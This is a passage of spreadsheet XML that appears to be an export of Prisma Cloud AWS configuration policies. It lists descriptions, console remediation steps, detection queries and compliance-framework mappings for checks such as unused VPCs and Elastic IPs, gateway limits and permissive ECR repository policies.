800-171 Revision 2, CIS Controls v7.1, NIST SP 800-172, CSA CCM v.4.0.1, CSA CCM v.4.0.1, ISO/IEC 27018:2019</t>
        </is>
      </c>
      <c r="B1856" s="2" t="inlineStr">
        <is>
          <t>NO</t>
        </is>
      </c>
      <c r="C1856" s="2" t="inlineStr"/>
      <c r="D1856" t="inlineStr"/>
      <c r="E1856" t="inlineStr"/>
      <c r="F1856" t="inlineStr"/>
      <c r="G1856" t="b">
        <v>0</v>
      </c>
      <c r="H18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6" t="inlineStr">
        <is>
          <t>aws</t>
        </is>
      </c>
      <c r="J1856" t="inlineStr">
        <is>
          <t>aws-ec2</t>
        </is>
      </c>
      <c r="K1856" t="inlineStr">
        <is>
          <t>AWS VPC not in use</t>
        </is>
      </c>
      <c r="L1856" t="inlineStr">
        <is>
          <t>MISCONFIGURATION</t>
        </is>
      </c>
      <c r="M1856" t="inlineStr">
        <is>
          <t>informational</t>
        </is>
      </c>
      <c r="N1856" t="inlineStr">
        <is>
          <t>Prisma Cloud</t>
        </is>
      </c>
      <c r="O1856" t="inlineStr">
        <is>
          <t>config</t>
        </is>
      </c>
      <c r="P1856" t="inlineStr">
        <is>
          <t>run</t>
        </is>
      </c>
      <c r="Q1856" t="inlineStr">
        <is>
          <t>Control Category: 10.0</t>
        </is>
      </c>
      <c r="R1856" t="inlineStr">
        <is>
          <t>10.k</t>
        </is>
      </c>
      <c r="S1856" t="inlineStr"/>
      <c r="T1856" t="b">
        <v>0</v>
      </c>
      <c r="U1856" t="inlineStr">
        <is>
          <t>exposure</t>
        </is>
      </c>
      <c r="V1856" t="inlineStr">
        <is>
          <t>aws-ec2-describe-vpcs</t>
        </is>
      </c>
      <c r="W1856" t="inlineStr">
        <is>
          <t>This policy identifies VPCs which are not in use. These VPC resources might be unintentionally launched and AWS also imposes a limit to the number of VPCs allowed per region. So it is recommended to either delete or use effectively such VPCs that do not have resources attached to them.</t>
        </is>
      </c>
      <c r="X1856" t="inlineStr">
        <is>
          <t>1. Sign into the AWS console
2. In the console, select the specific region from region drop down on the top right corner, for which the alert is generated
3. Navigate to VPC Dashboard
4. Click on 'Your VPCs' and Choose the reported VPC
5. If you want use reported VPC, Associate subnets to VPC or If you want to delete VPC, Click on 'Actions' and Choose 'Delete VPC' from the dropdown</t>
        </is>
      </c>
      <c r="Y1856" t="inlineStr"/>
      <c r="Z1856" t="inlineStr">
        <is>
          <t>config from cloud.resource where api.name = 'aws-ec2-describe-vpcs' as X; config from cloud.resource where api.name = 'aws-ec2-describe-subnets' as Y; filter 'not $.X.vpcId equals $.Y.vpcId'; show X;</t>
        </is>
      </c>
      <c r="AA1856" t="inlineStr">
        <is>
          <t>Prisma Cloud System Admin</t>
        </is>
      </c>
      <c r="AB1856" t="inlineStr">
        <is>
          <t>2024-11-11 04:28:29</t>
        </is>
      </c>
      <c r="AC1856" t="inlineStr">
        <is>
          <t>PC-AWS-VPC-321</t>
        </is>
      </c>
      <c r="AD1856" t="b">
        <v>1</v>
      </c>
      <c r="AE1856" t="inlineStr">
        <is>
          <t>redlock_default</t>
        </is>
      </c>
      <c r="AF1856" t="inlineStr">
        <is>
          <t>risk</t>
        </is>
      </c>
      <c r="AG18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6" t="inlineStr">
        <is>
          <t>ee7ba0f4-904b-4dfa-9a04-9344b40cba69</t>
        </is>
      </c>
      <c r="AI1856" t="inlineStr">
        <is>
          <t>d2648b06-0370-442e-be52-961a31c2d309</t>
        </is>
      </c>
      <c r="AJ1856" t="inlineStr">
        <is>
          <t>true</t>
        </is>
      </c>
      <c r="AK1856" t="inlineStr">
        <is>
          <t>Discovered 2024/11/19/15:02</t>
        </is>
      </c>
    </row>
    <row r="1857">
      <c r="A1857" t="inlineStr">
        <is>
          <t>kashan ACSC Information Security Manual (ISM), Cybersecurity Maturity Model Certification (CMMC) v.1.02, ISO/IEC 27017:2015, MLPS 2.0 (Level 2), APRA (CPS 234) Information Security, NIST SP 800-172, ISO/IEC 27017:2015, CSA CCM v.4.0.1, APRA (CPS 234) Information Security, HITRUST CSF v.9.6.0, Brazilian Data Protection Law (LGPD), MAS TRM 2021, MAS TRM 2021, ISO/IEC 27017:2015, RBI Baseline Cyber Security and Resilience Requirements, ISO/IEC 27017:2015, Copy of CIS Controls v8, Secure Controls Framework (SCF) - 2024.2, CIS Controls v8, NIST CSF, CHC HITRUST CSF v.9.6.0, Secure Controls Framework (SCF) - 2024.2, ISO/IEC 27017:2015, Copy of ACSC Information Security Manual (ISM)-clone, CSA CCM v.4.0.1, CHC HITRUST CSF v.9.6.0, NIST SP 800-171 Revision 3, Secure Controls Framework (SCF) - 2024.2, Secure Controls Framework (SCF) - 2022.2.1, ACSC Information Security Manual (ISM), CSA CCM v.4.0.1, ISO/IEC 27002:2013, PCI DSS v3.2.1, ISO/IEC 27002:2013, ISO/IEC 27017:2015, CSA CCM v.4.0.1, ISO/IEC 27002:2013, CSA CCM v.4.0.1, ISO/IEC 27002:2013, APRA (CPS 234) Information Security, kfirdaus AWS Account-CS, Cybersecurity Maturity Model Certification (CMMC) v.2.0 (Level 2), HITRUST v.9.4.2 [Deprecated], CIS Controls v8.1, ISO/IEC 27002:2013, Secure Controls Framework (SCF) - 2022.2.1, HITRUST CSF v.9.6.0, NIST SP 800-171 Revision 2, CIS Controls v7.1, NIST SP 800-172, CSA CCM v.4.0.1, CSA CCM v.4.0.1, ISO/IEC 27018:2019, Microsoft Cloud Security Benchmark v1</t>
        </is>
      </c>
      <c r="B1857" s="2" t="inlineStr">
        <is>
          <t>NO</t>
        </is>
      </c>
      <c r="C1857" s="2" t="inlineStr"/>
      <c r="D1857" t="inlineStr"/>
      <c r="E1857" t="inlineStr"/>
      <c r="F1857" t="inlineStr"/>
      <c r="G1857" t="b">
        <v>0</v>
      </c>
      <c r="H18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7" t="inlineStr">
        <is>
          <t>aws</t>
        </is>
      </c>
      <c r="J1857" t="inlineStr">
        <is>
          <t>aws-ec2</t>
        </is>
      </c>
      <c r="K1857" t="inlineStr">
        <is>
          <t>AWS regions nearing VPC Private Gateway limit</t>
        </is>
      </c>
      <c r="L1857" t="inlineStr">
        <is>
          <t>MISCONFIGURATION</t>
        </is>
      </c>
      <c r="M1857" t="inlineStr">
        <is>
          <t>informational</t>
        </is>
      </c>
      <c r="N1857" t="inlineStr">
        <is>
          <t>Prisma Cloud</t>
        </is>
      </c>
      <c r="O1857" t="inlineStr">
        <is>
          <t>config</t>
        </is>
      </c>
      <c r="P1857" t="inlineStr">
        <is>
          <t>run</t>
        </is>
      </c>
      <c r="Q1857" t="inlineStr">
        <is>
          <t>Guidelines for Networking</t>
        </is>
      </c>
      <c r="R1857" t="inlineStr">
        <is>
          <t>ISM-1437</t>
        </is>
      </c>
      <c r="S1857" t="inlineStr"/>
      <c r="T1857" t="b">
        <v>0</v>
      </c>
      <c r="U1857" t="inlineStr">
        <is>
          <t>exposure</t>
        </is>
      </c>
      <c r="V1857" t="inlineStr">
        <is>
          <t>aws-ec2-describe-vpn-gateways-summary</t>
        </is>
      </c>
      <c r="W1857" t="inlineStr">
        <is>
          <t>This policy identifies if your account is near the private gateway limitation per VPC per Region. AWS provides a reasonable starting limitation for the maximum number of Virtual private gateways you can assign in each VPC. If you approach the limit in a particular VPC, this alert indicates that you have nearly exhausted your allocation.
NOTE: As per http://docs.aws.amazon.com/general/latest/gr/aws_service_limits.html Virtual private gateway per region limit is 5. This policy will trigger an alert if Virtual private gateway per region reached 80% (i.e. 4) of resource availability limit allocated.</t>
        </is>
      </c>
      <c r="X1857" t="inlineStr">
        <is>
          <t>1. Sign in to the AWS console
2. In the console, select the specific region from region drop down on the top right corner, for which the alert is generated
3. Navigate to VPC Dashboard
4. Click on 'Virtual Private Gateways' (Left Panel)
5. Choose the Virtual Private Gateway you want to delete, which is not used or required
6. Click on 'Actions' dropdown
7. Click on 'Delete Virtual Private Gateway'NOTE: If Virtual Private Gateway is already in use it can not be deleted. Make sure gateways unassociated before going to deleting it.
8. On 'Delete Virtual Private Gateway' popup dialog, Click on 'Yes, Delete'NOTE: If existing Virtual Private Gateways are properly associated and exhausted your VPC Virtual Private Gateway limit allocation, you can contact AWS for a service limit increase.</t>
        </is>
      </c>
      <c r="Y1857" t="inlineStr"/>
      <c r="Z1857" t="inlineStr">
        <is>
          <t>config from cloud.resource where cloud.type = 'aws' AND api.name = 'aws-ec2-describe-vpn-gateways-summary' AND json.rule = 'TotalVPNGateways greater than 3'</t>
        </is>
      </c>
      <c r="AA1857" t="inlineStr">
        <is>
          <t>Prisma Cloud System Admin</t>
        </is>
      </c>
      <c r="AB1857" t="inlineStr">
        <is>
          <t>2024-11-11 04:28:29</t>
        </is>
      </c>
      <c r="AC1857" t="inlineStr">
        <is>
          <t>PC-AWS-VPC-308</t>
        </is>
      </c>
      <c r="AD1857" t="b">
        <v>1</v>
      </c>
      <c r="AE1857" t="inlineStr">
        <is>
          <t>redlock_default</t>
        </is>
      </c>
      <c r="AF1857" t="inlineStr">
        <is>
          <t>risk</t>
        </is>
      </c>
      <c r="AG18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7" t="inlineStr">
        <is>
          <t>4a37335a-64d6-4582-8dee-7d3969815f6d</t>
        </is>
      </c>
      <c r="AI1857" t="inlineStr">
        <is>
          <t>d3fb2c69-93c0-4b33-a1c3-121faf243bc5</t>
        </is>
      </c>
      <c r="AJ1857" t="inlineStr">
        <is>
          <t>true</t>
        </is>
      </c>
      <c r="AK1857" t="inlineStr">
        <is>
          <t>Discovered 2024/11/19/15:02</t>
        </is>
      </c>
    </row>
    <row r="1858">
      <c r="A1858" t="inlineStr">
        <is>
          <t>kashan ACSC Information Security Manual (ISM), MLPS 2.0 (Level 2), NYDFS 23 CRR-NY 500.0, HITRUST CSF v.9.6.0, MAS TRM 2021, MAS TRM 2021, RBI Baseline Cyber Security and Resilience Requirements, Copy of CIS Controls v8, FFIEC, Secure Controls Framework (SCF) - 2024.2, CIS Controls v8, CHC HITRUST CSF v.9.6.0, Secure Controls Framework (SCF) - 2024.2, Copy of ACSC Information Security Manual (ISM)-clone, CHC HITRUST CSF v.9.6.0, Secure Controls Framework (SCF) - 2022.2.1, ACSC Information Security Manual (ISM), NYDFS 23 CRR-NY 500.0, kfirdaus AWS Account-CS, FFIEC, Cybersecurity Maturity Model Certification (CMMC) v.2.0 (Level 2), CIS Controls v8.1, Secure Controls Framework (SCF) - 2022.2.1, HITRUST CSF v.9.6.0, CIS Controls v7.1, FFIEC</t>
        </is>
      </c>
      <c r="B1858" s="2" t="inlineStr">
        <is>
          <t>NO</t>
        </is>
      </c>
      <c r="C1858" s="2" t="inlineStr"/>
      <c r="D1858" t="inlineStr"/>
      <c r="E1858" t="inlineStr"/>
      <c r="F1858" t="inlineStr"/>
      <c r="G1858" t="b">
        <v>0</v>
      </c>
      <c r="H18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8" t="inlineStr">
        <is>
          <t>aws</t>
        </is>
      </c>
      <c r="J1858" t="inlineStr">
        <is>
          <t>aws-ec2</t>
        </is>
      </c>
      <c r="K1858" t="inlineStr">
        <is>
          <t>AWS Elastic IP not in use</t>
        </is>
      </c>
      <c r="L1858" t="inlineStr">
        <is>
          <t>MISCONFIGURATION</t>
        </is>
      </c>
      <c r="M1858" t="inlineStr">
        <is>
          <t>informational</t>
        </is>
      </c>
      <c r="N1858" t="inlineStr">
        <is>
          <t>Prisma Cloud</t>
        </is>
      </c>
      <c r="O1858" t="inlineStr">
        <is>
          <t>config</t>
        </is>
      </c>
      <c r="P1858" t="inlineStr">
        <is>
          <t>run</t>
        </is>
      </c>
      <c r="Q1858" t="inlineStr">
        <is>
          <t>Guidelines for Networking</t>
        </is>
      </c>
      <c r="R1858" t="inlineStr">
        <is>
          <t>ISM-1437</t>
        </is>
      </c>
      <c r="S1858" t="inlineStr"/>
      <c r="T1858" t="b">
        <v>0</v>
      </c>
      <c r="U1858" t="inlineStr">
        <is>
          <t>exposure</t>
        </is>
      </c>
      <c r="V1858" t="inlineStr">
        <is>
          <t>aws-ec2-elastic-address</t>
        </is>
      </c>
      <c r="W1858" t="inlineStr">
        <is>
          <t>This policy identifies unused Elastic IP (EIP) addresses in your AWS account. Any Elastic IP in your AWS account is adding charges to your monthly bill, although it is not associated with any resources. As a best practice, it is recommended to associate/remove Elastic IPs that are not associated with any resources, it will also help you avoid unexpected charges on your bill.
For more details:
https://docs.aws.amazon.com/AWSEC2/latest/UserGuide/elastic-ip-addresses-eip.html#using-instance-addressing-eips-associating</t>
        </is>
      </c>
      <c r="X1858" t="inlineStr">
        <is>
          <t>1. Log in to the AWS Console
2. In the console, select the specific region from the region drop-down on the top right corner, for which the alert is generated.
3. Navigate to the VPC dashboard 
4. Go to 'Elastic IPs', from the left panel
5. Select the reported Elastic IP
- If Elastic IP is not required; release IP by selecting 'Release Elastic IP address' from the 'Actions' dropdown.
- If Elastic IP is required; associate IP by selecting 'Associate Elastic IP address' from the 'Actions' dropdown.</t>
        </is>
      </c>
      <c r="Y1858" t="inlineStr"/>
      <c r="Z1858" t="inlineStr">
        <is>
          <t>config from cloud.resource where cloud.type = 'aws' AND api.name = 'aws-ec2-elastic-address' AND json.rule = associationId does not exist</t>
        </is>
      </c>
      <c r="AA1858" t="inlineStr">
        <is>
          <t>Prisma Cloud System Admin</t>
        </is>
      </c>
      <c r="AB1858" t="inlineStr">
        <is>
          <t>2024-11-11 04:28:29</t>
        </is>
      </c>
      <c r="AC1858" t="inlineStr">
        <is>
          <t>PC-AWS-EC2-701</t>
        </is>
      </c>
      <c r="AD1858" t="b">
        <v>1</v>
      </c>
      <c r="AE1858" t="inlineStr">
        <is>
          <t>redlock_default</t>
        </is>
      </c>
      <c r="AF1858" t="inlineStr">
        <is>
          <t>risk</t>
        </is>
      </c>
      <c r="AG18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8" t="inlineStr">
        <is>
          <t>fae6c539-55ef-4cfd-a021-d939e8235116</t>
        </is>
      </c>
      <c r="AI1858" t="inlineStr">
        <is>
          <t>cb64e10f-6c26-4c79-8e8c-49370f9013e4</t>
        </is>
      </c>
      <c r="AJ1858" t="inlineStr">
        <is>
          <t>true</t>
        </is>
      </c>
      <c r="AK1858" t="inlineStr">
        <is>
          <t>Discovered 2024/11/19/15:02</t>
        </is>
      </c>
    </row>
    <row r="1859">
      <c r="A1859" t="inlineStr">
        <is>
          <t>kashan ACSC Information Security Manual (ISM), ISO/IEC 27017:2015, MLPS 2.0 (Level 2), APRA (CPS 234) Information Security, Cybersecurity Maturity Model Certification (CMMC) v.1.02, NIST SP 800-172, ISO/IEC 27017:2015, CSA CCM v.4.0.1, APRA (CPS 234) Information Security, HITRUST CSF v.9.6.0, MAS TRM 2021, MAS TRM 2021, Framework for Adoption of Cloud Services by SEBI Regulated Entities (REs), ISO/IEC 27017:2015, RBI Baseline Cyber Security and Resilience Requirements, ISO/IEC 27017:2015, Copy of CIS Controls v8, Secure Controls Framework (SCF) - 2024.2, CIS Controls v8, NIST CSF, CHC HITRUST CSF v.9.6.0, Secure Controls Framework (SCF) - 2024.2, ISO/IEC 27017:2015, Copy of ACSC Information Security Manual (ISM)-clone, CSA CCM v.4.0.1, CHC HITRUST CSF v.9.6.0, NIST SP 800-171 Revision 3, Secure Controls Framework (SCF) - 2024.2, Secure Controls Framework (SCF) - 2022.2.1, ACSC Information Security Manual (ISM), CSA CCM v.4.0.1, ISO/IEC 27002:2013, PCI DSS v3.2.1, ISO/IEC 27002:2013, ISO/IEC 27017:2015, CSA CCM v.4.0.1, ISO/IEC 27002:2013, CSA CCM v.4.0.1, ISO/IEC 27002:2013, APRA (CPS 234) Information Security, kfirdaus AWS Account-CS, Cybersecurity Maturity Model Certification (CMMC) v.2.0 (Level 2), HITRUST v.9.4.2 [Deprecated], CIS Controls v8.1, ISO/IEC 27002:2013, Brazilian Data Protection Law (LGPD), Secure Controls Framework (SCF) - 2022.2.1, HITRUST CSF v.9.6.0, NIST SP 800-171 Revision 2, CIS Controls v7.1, NIST SP 800-172, CSA CCM v.4.0.1, CSA CCM v.4.0.1, ISO/IEC 27018:2019, Microsoft Cloud Security Benchmark v1</t>
        </is>
      </c>
      <c r="B1859" s="2" t="inlineStr">
        <is>
          <t>NO</t>
        </is>
      </c>
      <c r="C1859" s="2" t="inlineStr"/>
      <c r="D1859" t="inlineStr"/>
      <c r="E1859" t="inlineStr"/>
      <c r="F1859" t="inlineStr"/>
      <c r="G1859" t="b">
        <v>0</v>
      </c>
      <c r="H18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59" t="inlineStr">
        <is>
          <t>aws</t>
        </is>
      </c>
      <c r="J1859" t="inlineStr">
        <is>
          <t>aws-ec2</t>
        </is>
      </c>
      <c r="K1859" t="inlineStr">
        <is>
          <t>AWS regions nearing VPC Private Gateway IPSec Limit</t>
        </is>
      </c>
      <c r="L1859" t="inlineStr">
        <is>
          <t>MISCONFIGURATION</t>
        </is>
      </c>
      <c r="M1859" t="inlineStr">
        <is>
          <t>informational</t>
        </is>
      </c>
      <c r="N1859" t="inlineStr">
        <is>
          <t>Prisma Cloud</t>
        </is>
      </c>
      <c r="O1859" t="inlineStr">
        <is>
          <t>config</t>
        </is>
      </c>
      <c r="P1859" t="inlineStr">
        <is>
          <t>run</t>
        </is>
      </c>
      <c r="Q1859" t="inlineStr">
        <is>
          <t>Guidelines for Networking</t>
        </is>
      </c>
      <c r="R1859" t="inlineStr">
        <is>
          <t>ISM-1437</t>
        </is>
      </c>
      <c r="S1859" t="inlineStr"/>
      <c r="T1859" t="b">
        <v>0</v>
      </c>
      <c r="U1859" t="inlineStr">
        <is>
          <t>exposure</t>
        </is>
      </c>
      <c r="V1859" t="inlineStr">
        <is>
          <t>aws-ec2-vpn-connections-summary</t>
        </is>
      </c>
      <c r="W1859" t="inlineStr">
        <is>
          <t>This policy identifies if your account is near the private gateway IPSec limitation per VPC per Region. AWS provides a reasonable starting limitation for the maximum number of VPC Private Gateway IPSec connections you can assign in each VPC. If you approach the limit in a particular VPC, this alert indicates that you have nearly exhausted your allocation.</t>
        </is>
      </c>
      <c r="X1859" t="inlineStr">
        <is>
          <t>1. Sign in to the AWS console.
2. In the console, select the specific region from region drop down on the top right corner, for which the alert is generated.
3. Navigate to VPC Dashboard
4. Click on 'Site-to-Site VPN Connections' (Left Panel)
5. Choose the VPN connection you want to delete, which more used or required
6. Click on 'Actions' dropdown
7. Click on 'Delete'
8. On 'Delete' popup dialog, Click on 'Delete'
NOTE: If existing VPN Connection is properly associated and exhausted your VPC Site-to-Site VPN Connections limit allocation, you can contact AWS for a service limit increase.</t>
        </is>
      </c>
      <c r="Y1859" t="inlineStr"/>
      <c r="Z1859" t="inlineStr">
        <is>
          <t>config from cloud.resource where cloud.type = 'aws' AND api.name = 'aws-ec2-vpn-connections-summary' AND json.rule = 'vpnConnectionsSummary[*].vpnConnectionsCount greater than 7'</t>
        </is>
      </c>
      <c r="AA1859" t="inlineStr">
        <is>
          <t>Prisma Cloud System Admin</t>
        </is>
      </c>
      <c r="AB1859" t="inlineStr">
        <is>
          <t>2024-11-11 04:28:29</t>
        </is>
      </c>
      <c r="AC1859" t="inlineStr">
        <is>
          <t>PC-AWS-VPC-328</t>
        </is>
      </c>
      <c r="AD1859" t="b">
        <v>1</v>
      </c>
      <c r="AE1859" t="inlineStr">
        <is>
          <t>redlock_default</t>
        </is>
      </c>
      <c r="AF1859" t="inlineStr">
        <is>
          <t>risk</t>
        </is>
      </c>
      <c r="AG18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59" t="inlineStr">
        <is>
          <t>7c7ba054-0fda-48da-a20a-1ace72e62d80</t>
        </is>
      </c>
      <c r="AI1859" t="inlineStr">
        <is>
          <t>9cf16ddc-10fb-4f04-8255-8853f8b53cc9</t>
        </is>
      </c>
      <c r="AJ1859" t="inlineStr">
        <is>
          <t>true</t>
        </is>
      </c>
      <c r="AK1859" t="inlineStr">
        <is>
          <t>Discovered 2024/11/19/15:02</t>
        </is>
      </c>
    </row>
    <row r="1860">
      <c r="A1860" t="inlineStr">
        <is>
          <t>Microsoft Cloud Security Benchmark v1, CIS Controls v8.1, SOC 2, Microsoft Cloud Security Benchmark v1</t>
        </is>
      </c>
      <c r="B1860" s="2" t="inlineStr">
        <is>
          <t>NO</t>
        </is>
      </c>
      <c r="C1860" s="2" t="inlineStr"/>
      <c r="D1860" t="inlineStr"/>
      <c r="E1860" t="inlineStr"/>
      <c r="F1860" t="inlineStr"/>
      <c r="G1860" t="b">
        <v>1</v>
      </c>
      <c r="H18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60" t="inlineStr">
        <is>
          <t>aws</t>
        </is>
      </c>
      <c r="J1860" t="inlineStr">
        <is>
          <t>aws-ecr</t>
        </is>
      </c>
      <c r="K1860" t="inlineStr">
        <is>
          <t>AWS ECR private repository tag mutable</t>
        </is>
      </c>
      <c r="L1860" t="inlineStr">
        <is>
          <t>MISCONFIGURATION</t>
        </is>
      </c>
      <c r="M1860" t="inlineStr">
        <is>
          <t>informational</t>
        </is>
      </c>
      <c r="N1860" t="inlineStr">
        <is>
          <t>Prisma Cloud</t>
        </is>
      </c>
      <c r="O1860" t="inlineStr">
        <is>
          <t>config</t>
        </is>
      </c>
      <c r="P1860" t="inlineStr">
        <is>
          <t>run</t>
        </is>
      </c>
      <c r="Q1860" t="inlineStr">
        <is>
          <t>NS</t>
        </is>
      </c>
      <c r="R1860" t="inlineStr">
        <is>
          <t>NS-2</t>
        </is>
      </c>
      <c r="S1860" t="inlineStr"/>
      <c r="T1860" t="b">
        <v>0</v>
      </c>
      <c r="U1860" t="inlineStr">
        <is>
          <t>exposure</t>
        </is>
      </c>
      <c r="V1860" t="inlineStr">
        <is>
          <t>aws-ecr-get-repository-policy</t>
        </is>
      </c>
      <c r="W1860" t="inlineStr">
        <is>
          <t>This policy identifies AWS ECR private repositories whose tag immutability is not configured.
AWS Elastic Container Registry (ECR) tag immutability ensures that once an image is pushed to a repository with tag immutability enabled, the tag cannot be overwritten or updated. This feature is useful for ensuring the security, integrity, and reliability of container images in production environments. It prevents tags from being overwritten, which can help prevent unauthorised changes to images.
It is recommended to enable tag immutability on ECR repositories to maintain the integrity and security of the images pushed.</t>
        </is>
      </c>
      <c r="X1860" t="inlineStr">
        <is>
          <t>To enable tag immutability for an ECR repository, follow the below steps:
1. Log into the AWS console and navigate to the ECR dashboard.
2. In the navigation pane, choose 'Repositories' under 'Private registry'.
3. Select the repository you want to edit and choose 'Edit' from the 'Actions' dropdown.
4. Make 'Tag immutability' to 'enabled'.
5. Choose 'Save'.</t>
        </is>
      </c>
      <c r="Y1860" t="inlineStr"/>
      <c r="Z1860" t="inlineStr">
        <is>
          <t>config from cloud.resource where cloud.type = 'aws' AND api.name = 'aws-ecr-get-repository-policy' AND json.rule = imageTagMutability equal ignore case mutable</t>
        </is>
      </c>
      <c r="AA1860" t="inlineStr">
        <is>
          <t>Prisma Cloud System Admin</t>
        </is>
      </c>
      <c r="AB1860" t="inlineStr">
        <is>
          <t>2024-11-11 04:28:29</t>
        </is>
      </c>
      <c r="AC1860" t="inlineStr">
        <is>
          <t>PC-AWS-ECR-1199</t>
        </is>
      </c>
      <c r="AD1860" t="b">
        <v>1</v>
      </c>
      <c r="AE1860" t="inlineStr">
        <is>
          <t>redlock_default</t>
        </is>
      </c>
      <c r="AF1860" t="inlineStr">
        <is>
          <t>risk</t>
        </is>
      </c>
      <c r="AG18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60" t="inlineStr">
        <is>
          <t>2a88c923-7478-48a6-8cd0-2467843f70b4</t>
        </is>
      </c>
      <c r="AI1860" t="inlineStr">
        <is>
          <t>87eefbdf-f923-4df5-aefb-e57de5fb669b</t>
        </is>
      </c>
      <c r="AJ1860" t="inlineStr">
        <is>
          <t>true</t>
        </is>
      </c>
      <c r="AK1860" t="inlineStr">
        <is>
          <t>Discovered 2024/11/19/15:02</t>
        </is>
      </c>
    </row>
    <row r="1861">
      <c r="A1861" t="inlineStr">
        <is>
          <t>ISO/IEC 27001:2022, APRA (CPS 234) Information Security, APRA (CPS 234) Information Security, ISO 27002:2022, Cybersecurity Maturity Model Certification (CMMC) v.1.02, RBI Baseline Cyber Security and Resilience Requirements, APRA (CPS 234) Information Security, RBI Baseline Cyber Security and Resilience Requirements, CIS Controls v8.1, ISO 27002:2022, MITRE ATT&amp;CK v15.1 Cloud IaaS for Enterprise, NIST CSF v2.0, SEBI - Consolidated Cybersecurity and Cyber Resilience Framework (CSCRF), HITRUST v.9.4.2 [Deprecated], APRA (CPS 234) Information Security, ISO/IEC 27001:2022, CSA CCM v.4.0.6, ISO 27002:2022, Cybersecurity Maturity Model Certification (CMMC) v.2.0 (Level 1), NIST 800-53 Rev 5, NIST SP 800-171 Revision 3, ISO 27002:2022, NIST 800-53 Rev4, CIS Controls v8.1, ACSC Information Security Manual (ISM), Secure Controls Framework (SCF) - 2022.2.1, HIPAA, ITSG-33, TX-RAMP Level 2, kashan ACSC Information Security Manual (ISM), NIST 800-53 Rev 5, CyberSecurity Law of the People's Republic of China, Insurance Regulatory And Development Authority Of India, CIS Controls v7.1, Brazilian Data Protection Law (LGPD), CHC HITRUST CSF v.9.6.0, Sarbanes Oxley Act (SOX), PCI DSS v4.0, Secure Controls Framework (SCF) - 2024.2, Sarbanes Oxley Act (SOX), NIST SP 800-171 Revision 3, jneytchev-fedramp-low, Copy of CIS Controls v8, CRI Profile v1.2.1, Risk Management in Technology (RMiT), CIS Controls v8, CIS Controls v8, MLPS 2.0 (Level 2), CRI Profile v2.0, CyberSecurity Law of the People's Republic of China, SOC 2, SOC 2, APRA (CPS 234) Information Security, ISO/IEC 27001:2022, Framework for Adoption of Cloud Services by SEBI Regulated Entities (REs), Secure Controls Framework (SCF) - 2024.2, APRA (CPS 234) Information Security, CyberSecurity Law of the People's Republic of China, HITRUST v.9.4.2 [Deprecated], ISO/IEC 27001:2022, TX-RAMP Level 1, ISO 27002:2022, Copy of CIS Controls v8, NIST SP 800-172, PCI DSS v3.2.1, Copy of ACSC Information Security Manual (ISM)-clone, Fedramp (Low), HITRUST CSF v.9.6.0, MAS TRM 2021, APRA (CPS 234) Information Security, CDC NIST 800-53 Rev4, kfirdaus AWS Account-CS, ISO/IEC 27001:2022, Cybersecurity Maturity Model Certification (CMMC) v.2.0 (Level 1), FFIEC, Fedramp (Moderate), Microsoft Cloud Security Benchmark v1, PCI DSS v3.2.1, NIST SP 800-171 Revision 2</t>
        </is>
      </c>
      <c r="B1861" s="2" t="inlineStr">
        <is>
          <t>NO</t>
        </is>
      </c>
      <c r="C1861" s="2" t="inlineStr"/>
      <c r="D1861" t="inlineStr"/>
      <c r="E1861" t="inlineStr"/>
      <c r="F1861" t="inlineStr"/>
      <c r="G1861" t="b">
        <v>1</v>
      </c>
      <c r="H18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1" t="inlineStr">
        <is>
          <t>aws</t>
        </is>
      </c>
      <c r="J1861" t="inlineStr">
        <is>
          <t>aws-ecr</t>
        </is>
      </c>
      <c r="K1861" t="inlineStr">
        <is>
          <t>AWS Private ECR repository policy is overly permissive</t>
        </is>
      </c>
      <c r="L1861" t="inlineStr">
        <is>
          <t>PRIVILEGE_ESCALATION</t>
        </is>
      </c>
      <c r="M1861" t="inlineStr">
        <is>
          <t>medium</t>
        </is>
      </c>
      <c r="N1861" t="inlineStr">
        <is>
          <t>Prisma Cloud</t>
        </is>
      </c>
      <c r="O1861" t="inlineStr">
        <is>
          <t>config</t>
        </is>
      </c>
      <c r="P1861" t="inlineStr">
        <is>
          <t>build,run</t>
        </is>
      </c>
      <c r="Q1861" t="inlineStr">
        <is>
          <t>Guidelines for Personnel Security</t>
        </is>
      </c>
      <c r="R1861" t="inlineStr">
        <is>
          <t>ISM-1566</t>
        </is>
      </c>
      <c r="S1861" t="inlineStr"/>
      <c r="T1861" t="b">
        <v>0</v>
      </c>
      <c r="U1861" t="inlineStr">
        <is>
          <t>exposure</t>
        </is>
      </c>
      <c r="V1861" t="inlineStr">
        <is>
          <t>aws-ecr-get-repository-policy</t>
        </is>
      </c>
      <c r="W1861" t="inlineStr">
        <is>
          <t>This policy identifies AWS Private ECR repositories that have overly permissive registry policies. An ECR(Elastic Container Registry) repository is a collection of Docker images available on the AWS cloud. These images might contain sensitive information which should be restricted to unauthorized users.</t>
        </is>
      </c>
      <c r="X1861" t="inlineStr">
        <is>
          <t>1. Log in to the AWS Console
2. In the console, select the specific region from region drop down on the top right corner, for which the alert is generated.
3. Navigate to 'ECR' dashboard from 'Services' dropdown
4. Go to 'Repository', from the left panel
5. Select the repository for which alert is being generated
6. Select the 'Permissions' option from left menu below 'repositores'
7. Click on 'Edit policy JSON' to modify the JSON so that Principal is restrictive
8. After modifications, click on 'Save'. 
Build Recommendation: Refer the documentation for more details,
https://docs.prismacloud.io/en/enterprise-edition/policy-reference/aws-policies/public-policies/public-1-ecr-repositories-not-public
IaC: Refer the documentation for more details,
https://docs.prismacloud.io/en/enterprise-edition/policy-reference/aws-policies/public-policies/public-1-ecr-repositories-not-public</t>
        </is>
      </c>
      <c r="Y1861" t="inlineStr"/>
      <c r="Z1861" t="inlineStr">
        <is>
          <t>config from cloud.resource where cloud.type = 'aws' AND api.name = 'aws-ecr-get-repository-policy' AND json.rule = policy.Statement[?any((Principal equals * or Principal.AWS contains *) and Effect equals Allow and Condition does not exist)] exists
{"category":"Public","resourceTypes":["aws_ecr_repository_policy"]}</t>
        </is>
      </c>
      <c r="AA1861" t="inlineStr">
        <is>
          <t>Prisma Cloud System Admin</t>
        </is>
      </c>
      <c r="AB1861" t="inlineStr">
        <is>
          <t>2024-11-11 04:28:29</t>
        </is>
      </c>
      <c r="AC1861" t="inlineStr">
        <is>
          <t>PC-AWS-ECR-434-CKV_AWS_32</t>
        </is>
      </c>
      <c r="AD1861" t="b">
        <v>1</v>
      </c>
      <c r="AE1861" t="inlineStr">
        <is>
          <t>redlock_default</t>
        </is>
      </c>
      <c r="AF1861" t="inlineStr">
        <is>
          <t>risk</t>
        </is>
      </c>
      <c r="AG18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1" t="inlineStr">
        <is>
